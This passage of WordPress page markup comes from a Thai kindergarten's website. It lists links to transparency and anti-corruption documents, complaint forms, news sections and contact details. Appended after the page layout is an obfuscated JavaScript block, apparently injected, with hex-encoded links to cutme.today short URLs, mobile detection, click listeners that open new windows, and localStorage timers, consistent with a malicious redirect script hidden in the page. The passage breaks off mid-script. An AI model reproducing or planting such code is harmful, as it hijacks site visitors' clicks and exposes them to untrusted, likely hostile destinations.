data-id=\"https://drive.google.com/file/d/16p7JP94yt1fzyAiaRNuuxqppMr-Z_s87/view?usp=share_link\">รายงานการบริหารและพัฒนาทรัพยากรบุคคลประจำปี</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1NEYcpYMKhZ8r6tEVPscCjn9illJwN0w8/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1NEYcpYMKhZ8r6tEVPscCjn9illJwN0w8/view?usp=share_link\">ประมวลจริยธรรมสำหรับเจ้าหน้าที่ของรัฐ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/19Mzx-IUTBkQj1tAebM57-8yAiovgLP2n/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/19Mzx-IUTBkQj1tAebM57-8yAiovgLP2n/view?usp=share_link\">การขับเคลื่อนจริยธรรม</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8e160f87\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8e160f87 gb-button-text\"><strong>การส่งเสริมความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/1vpEfIBbTNX95TmNJuW7IdN5nLwUBzkuN/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1vpEfIBbTNX95TmNJuW7IdN5nLwUBzkuN/view?usp=drive_link\">แนวปฏิบัติการจัดการเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"https://forms.gle/KBRUecqKvRqxgrPm7\" data-type=\"link\" data-id=\"https://forms.gle/KBRUecqKvRqxgrPm7\">ช่องทางแจ้งเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1mvYvdhMLSABxaSKEGWClts0-nIUc7pwg/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1mvYvdhMLSABxaSKEGWClts0-nIUc7pwg/view?usp=sharing\">ข้อมูลเชิงสถิติเรื่องร้องเรียนการทุจริตและปรพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1sEnWAaXCQZ5zH9fciWyPRwRvdXA95k8x/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1sEnWAaXCQZ5zH9fciWyPRwRvdXA95k8x/view?usp=share_link\">การเปิดโอกาสให้เกิดการมีส่วนร่วม</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"dd227e0e\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-dd227e0e gb-button-text\"><strong>การดำเนินการเพื่อป้องกันการทุจริตในประเด็นสินบน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/10Sl2uV0MH7K-Cnm_cbftOiRWMmdulXqc/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/10Sl2uV0MH7K-Cnm_cbftOiRWMmdulXqc/view?usp=share_link\">ประกาศเจตนารมณ์นโยบาย No Gift Policy จากการปฏิบัติหน้าที่</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1WCZh2eU-3QNzEeCUNBD2FjlkORqZ7x1n/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1WCZh2eU-3QNzEeCUNBD2FjlkORqZ7x1n/view?usp=share_link\">การสร้างวัฒนธรรม&nbsp; No Gift Policy</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1icrf52k0yexL-UwEM4ahuLs3tm6Ql8_Q/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1icrf52k0yexL-UwEM4ahuLs3tm6Ql8_Q/view?usp=share_link\">รายงานผลตามนโยบาย No Gift Policy</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1QpgojOLg93xMFq319R5HXVloKfolMM6v/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1QpgojOLg93xMFq319R5HXVloKfolMM6v/view?usp=share_link\">รายงานการรับทรัพย์สินบนหรือประโยชน์อื่นใดโดยธรรมจรรยา</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1W1gQsQUPnpERA_nlDfD3InVipLL6lnBt/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1W1gQsQUPnpERA_nlDfD3InVipLL6lnBt/view?usp=drive_link\">การประเมินความเสี่ยงการทุจริตในประเด็นที่เกี่ยวข้องกับสินบน</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1NK3-A2RUV5X8wgneATtANg0LWcCiaydb/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1NK3-A2RUV5X8wgneATtANg0LWcCiaydb/view?usp=share_link\">รายงานผลการดำเนินการเพื่อจัดการความเสี่ยงและประพฤติมิชอบประจำปี</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"85986834\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-85986834 gb-button-text\"><strong>มาตรการส่งเสริมคุณธรรมและความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/10vrLC6y6r5_UvjaVQt_BXXu3yUH_ls9i/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/10vrLC6y6r5_UvjaVQt_BXXu3yUH_ls9i/view?usp=share_link\">แผนการปฏิบัติการป้องกันการทุจริต</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1sPS_Yg50vqXIEkS1xwD-f4nBGOjW_xW7/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1sPS_Yg50vqXIEkS1xwD-f4nBGOjW_xW7/view?usp=share_link\">รายงานการดำเนินการป้องกันการทุจริตประจำปี</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1l76kF-c6CryzCngVGqebClQpOMRnofY1/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1l76kF-c6CryzCngVGqebClQpOMRnofY1/view?usp=share_link\">มาตรการส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1LOn6Jw1hFEEY_ikE_hexCNtU50UrYTtq/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1LOn6Jw1hFEEY_ikE_hexCNtU50UrYTtq/view?usp=share_link\">รายงานผลการดำเนินการเพื่อส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"76fbe2ef\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"19_91838d-0f\",\"columns\":[1,1,1,1,1,1],\"ids\":[81,82,83,84],\"linkTo\":\"custom\",\"showCaption\":true,\"captionStyle\":\"cover-hover\",\"gutter\":[10,\"\",10],\"displayShadow\":true,\"imagesDynamic\":[{\"id\":81,\"link\":\"https://nsschool.ac.th/home/%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b9%80%e0%b8%a1%e0%b8%b4%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"customLink\":\"https://docs.google.com/forms/d/e/1FAIpQLSeE1kKWcuOnYJpmEpbv5v8OHwhaZOO-bGbJU1Pe52CMO-1qTg/viewform?usp=share_link\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"width\":750,\"height\":259},{\"id\":82,\"link\":\"https://nsschool.ac.th/home/%e0%b8%8a%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%97%e0%b8%b2%e0%b8%87%e0%b9%81%e0%b8%88%e0%b9%89%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"customLink\":\"https://forms.gle/ogsMCed1YfypogeK8\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"width\":750,\"height\":259},{\"id\":83,\"link\":\"https://nsschool.ac.th/home/%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99%e0%b8%97%e0%b8%b8%e0%b8%88%e0%b8%a3%e0%b8%b4%e0%b8%95%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%9e%e0%b8%a4%e0%b8%95%e0%b8%b4/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"customLink\":\"https://forms.gle/ZyUhBS2TYmZiZVPR6\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"width\":750,\"height\":259},{\"id\":84,\"link\":\"https://nsschool.ac.th/home/%e0%b8%84%e0%b8%a7%e0%b8%b2%e0%b8%a1%e0%b8%84%e0%b8%b4%e0%b8%94%e0%b9%80%e0%b8%ab%e0%b9%87%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"customLink\":\"https://forms.gle/6upfY9jUcbu2kPti8\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"width\":750,\"height\":259}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"07462550\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:contentviews/grid1 {\"blockId\":\"7dr8k85x\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaSeparator\":\"|\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":250,\"xs\":100},\"thumbnailHeightUnits\":{\"xs\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"4\",\"headingText\":\"ข่าวกิจกรรมโรงเรียน\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"ข่าวกิจกรรมโรงเรียน\",\"value\":\"news\"}],\"meta-fieldsfSize\":{\"md\":11},\"headingBgColor\":\"#00000000\",\"headingWeight\":\"600\",\"headingfSize\":{\"md\":24},\"titleWeight\":\"500\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"taxotermfSize\":{\"md\":11},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"8rsrezsy\",\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":45},\"thumbnailHeight\":{\"md\":260},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"4\",\"headingText\":\"ผลงานนักเรียน/ครู\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ผลงานนักเรียน/ครู\",\"value\":\"%e0%b8%9c%e0%b8%a5%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%99%e0%b8%b1%e0%b8%81%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99-%e0%b8%84%e0%b8%a3%e0%b8%b9\"}],\"content-itemBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"meta-fieldsMargin\":{\"md\":{\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"headingColor\":\"#ffffff\",\"headingBgColor\":\"#cf2e2e\",\"headingWeight\":\"500\",\"headingBorderColor\":\"#f78da7\",\"headingfSize\":{\"md\":20},\"thumbnailAllPadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"readmoreColor\":\"#000000\",\"readmoreBgColor\":\"#eee9da\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"q4ud2298\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":3,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_bottom_right\",\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"\\u0026#8210;\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":300},\"thumbnailHeightUnits\":{\"md\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"3\",\"headingText\":\"จดหมายข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"จดหมายประชาสัมพันธ์\",\"value\":\"%e0%b8%88%e0%b8%94%e0%b8%ab%e0%b8%a1%e0%b8%b2%e0%b8%a2%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%8a%e0%b8%b2%e0%b8%aa%e0%b8%b1%e0%b8%a1%e0%b8%9e%e0%b8%b1%e0%b8%99%e0%b8%98%e0%b9%8c\"}],\"headingWeight\":\"600\",\"headingfSize\":{\"md\":24},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e68763c\",\"bgImage\":{\"id\":155,\"image\":{\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/rovbb.png\",\"height\":700,\"width\":2000,\"orientation\":\"landscape\"}},\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"a8863e18\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"73d9ffe7\",\"columns\":2,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"4cd8c7be\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:html -->\n<iframe src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d1925.9723083104054!2d104.32273680156584!3d15.106380799999997!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x3116e380deaa317f%3A0x4d9751ab2c19279f!2z4LmC4Lij4LiH4LmA4Lij4Li14Lii4LiZ4Lit4LiZ4Li44Lia4Liy4Lil4Lin4Lix4LiU4Lie4Lij4Liw4LmC4LiVICjguJ3guYjguLLguKLguKHguLHguJjguKLguKEp!5e0!3m2!1sth!2sth!4v1722088475215!5m2!1sth!2sth\" width=\"100%\" height=\"350\" style=\"border:0;\" allowfullscreen=\"\" loading=\"lazy\" referrerpolicy=\"no-referrer-when-downgrade\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"457aa97e\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingTop\":\"30px\",\"paddingRight\":\"30px\",\"paddingBottom\":\"0px\",\"paddingLeft\":\"30px\",\"paddingTopMobile\":\"40px\",\"paddingRightMobile\":\"15px\",\"paddingBottomMobile\":\"30px\",\"paddingLeftMobile\":\"15px\"}} -->\n<!-- wp:generateblocks/headline {\"uniqueId\":\"b3723dea\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-b3723dea gb-headline-text\"><strong>โรงเรียนอนุบาลวัดพระโต</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"51a75706\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-51a75706 gb-headline-text\">1193 ถนนขุขันธ์ ตำบลเมืองเหนือ อำเภอเมืองศรีสะเกษ จังหวัดศรีสะเกษ 33000</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"fa4bd31f\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-fa4bd31f gb-headline-text\"><strong>ติดต่อเรา</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e820350\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e820350 gb-headline-text\">โทรศัพท์ : 0-4561-2730</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e95d8cb\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e95d8cb gb-headline-text\"><strong>ติดตามเราได้ที่</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:html -->\n<iframe src=\"https://www.facebook.com/plugins/page.php?href=https%3A%2F%2Fwww.facebook.com%2Fprofile.php%3Fid%3D61556083436494&tabs=timeline&width=330&height=80&small_header=true&adapt_container_width=true&hide_cover=true&show_facepile=true&appId\" width=\"330\" height=\"80\" style=\"border:none;overflow:hidden\" scrolling=\"no\" frameborder=\"0\" allowfullscreen=\"true\" allow=\"autoplay; clipboard-write; encrypted-media; picture-in-picture; web-share\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container --></div></div>\n<!-- /wp:kadence/column -->\n<!-- /wp:kadence/rowlayout -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( 